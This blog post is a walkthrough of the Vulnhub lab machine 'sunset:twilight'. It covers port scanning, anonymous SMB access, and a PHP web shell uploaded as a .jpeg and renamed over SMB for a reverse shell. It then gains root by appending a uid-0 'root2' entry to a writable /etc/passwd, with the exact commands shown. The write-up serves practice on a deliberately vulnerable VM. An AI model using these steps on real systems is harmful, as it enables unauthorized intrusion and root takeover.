---
layout: post
title:  "Vulnhub - sunset:twilight"
date:   2020-08-28 00:00:00 +1000
category: hacking
---

## Introduction
*Easy/Intermediate (May variate depending on your background)  
It is recommended to run this machine in Virtualbox.  
This works better with VirtualBox rather than VMware*

Okay let's see what we can do with this.

## VMWare vs VirtualBox
I run Kali in VMWare but I do have VirtualBox too. I downloaded the [file](https://www.vulnhub.com/entry/sunset-twilight,512/) as the .7z archive and unzipped it, then imported the applicance into VirtualBox. For networking it defaults to Bridged Mode and that works okay; I check my router for DHCP leases and get the IP - 192.168.1.76.

The banner says it's *Debian GNU/Linux 10 twilight tty1*. Running a ping on the IP gives a TTL of 128; not sure what's up with that.

## Nmap
So we've got quite a selection of ports:

- 22/tcp    open  ssh          syn-ack ttl 128
- 25/tcp    open  smtp         syn-ack ttl 128
- 80/tcp    open  http         syn-ack ttl 128
- 139/tcp   open  netbios-ssn  syn-ack ttl 128
- 445/tcp   open  microsoft-ds syn-ack ttl 128
- 2121/tcp  open  ccproxy-ftp  syn-ack ttl 128
- 3306/tcp  open  mysql        syn-ack ttl 128
- 8080/tcp  open  http-proxy   syn-ack ttl 128
- 63525/tcp open  unknown      syn-ack ttl 128

We'll probably need some more details on those, so I kick off a detail scan. In the meantime...

## 2121/FTP
Port 2121 is FTP and anonymous login is allowed but there is nothing interesting in the directory and we can't move around, so that's not very useful.

## SMB

SMB anonymous login is allowed, so we can poke around the server:

{% highlight shell %}
root@kali:/opt/vulnhub/twilight# smbclient -L \\192.168.1.76
Enter WORKGROUP\roots password: 

	Sharename       Type      Comment
	---------       ----      -------
	WRKSHARE        Disk      Workplace Share. Do not access if not an employee.
	print$          Disk      Printer Drivers
	IPC$            IPC       IPC Service (Samba 4.9.5-Debian)
SMB1 disabled -- no workgroup available
{% endhighlight %}

We should check out that *WRKSHARE* folder.

``
root@kali:/opt/vulnhub/twilight# smbclient \\\\192.168.1.76\\WRKSHARE
``

This is actually the server root (assuming we're not in a container), so that's nice. I get **/etc/passwd** and can see we have a user called *miguel* in **/home**, but we can't read his directory. Checking **/var/www/html** we can poke around the files that make up the website on port 80, and there is an upload function in http://192.168.1.76/gallery/ - maybe we can use this for a shell?

## Shell

Sure enough we can upload a PHP shell as **shell.jpeg** through the web interface on port 80, then rename it via the SMB connection to **shell.php**. From there we can access it via http://192.168.1.76/gallery/original/shell.php and get a reverse shell back to our attack machine.

## Privesc
As usual I ran linpeas, and it highlighted that **/etc/passwd** was writeable, along with some other interesting things. I'm guessing there are a few paths to root on this box. Anyway, with a writeable passwd file, we can add a new user with a new password using this technique from [stackexchange](https://security.stackexchange.com/questions/151700/privilege-escalation-using-passwd-file).

{% highlight html %}
# to generate hash of the password
openssl passwd mrcake
hKLD3431415ZE

# to create a second root user with "mrcake" password
echo "root2:WVLY0mgH0RtUI:0:0:root:/root:/bin/bash" >> /etc/passwd

# to switch to a root2
su root2
Password: mrcake 
{% endhighlight %}

Let's try it out, and we'll even use his 'mrcake' password suggestion:

{% highlight shell %}  
www-data@twilight:/dev/shm$ openssl passwd mrcake
hKLD3431415ZEopenssl passwd mrcake
eAZbSNI9j8A7A
www-data@twilight:/dev/shm$ echo "root2:WVLY0mgH0RtUI:0:0:root:/root:/bin/bash" >> /etc/passwd
<Y0mgH0RtUI:0:0:root:/root:/bin/bash" >> /etc/passwd
www-data@twilight:/dev/shm$ su root2
su root2
Password: mrcake

root@twilight:/dev/shm# 
{% endhighlight %}

Boom. There is a flag in /root/root.txt, but there's nowhere to submit it so it doesn't really matter.

{% highlight shell %} 
cat root.txt
(\ 
\'\ 
 \'\     __________  
 / '|   ()_________)
 \ '/    \ ~~~~~~~~ \
   \       \ ~~~~~~   \
   ==).      \__________\
  (__)       ()__________)


34d3ecb1bbd092bcb87954cee55d88d3
{% endhighlight %}

## Footnote
I haven't been writing much lately, been stuck on some intermediate stuff on TryHackMe and not moving forward much. I did complete the 'Git Happens' room though, which was a very straightforward enumeration of a git repo to find some credentials. I also completed OpenKeyS on HackTheBox but I'm not allowed to write that up just yet. I've never bothered writing up a HTB machine yet, since I've moved on by the time they become inactive. Maybe one day.
